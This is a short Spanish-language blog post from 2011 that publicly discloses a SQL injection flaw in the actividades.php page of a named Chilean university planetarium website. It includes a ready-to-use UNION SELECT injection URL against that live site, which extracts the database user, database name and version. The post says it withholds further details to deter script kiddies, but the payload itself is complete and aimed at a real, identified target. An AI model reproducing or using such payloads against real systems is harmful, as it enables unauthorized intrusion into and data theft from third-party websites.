miércoles, 24 de agosto de 2011

[hack] - iSQL sitio de Planetario de Universidad de Santiago de Chile

8:13 Anónimo No comments

Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
actividades.php                            idNoticia 

 
Detalles:  Con solo inyectar ' en la url mencionada y se obtiene el error.
 
Ejemplo:

http://www.planetariochile.cl/actividades.php?idNoticia=102+and+1=0+union+select+all+1,2,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13

Sin más detalles para evitar el abuso de Script kiddies.

Posted in:

0 comentarios :

Publicar un comentario

Twitter Delicious Facebook Digg Stumbleupon Favorites More
RSS Feed Subscribe to Our RSS feed!
Sígueme en Twitter! Sígueme en Twitter!

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host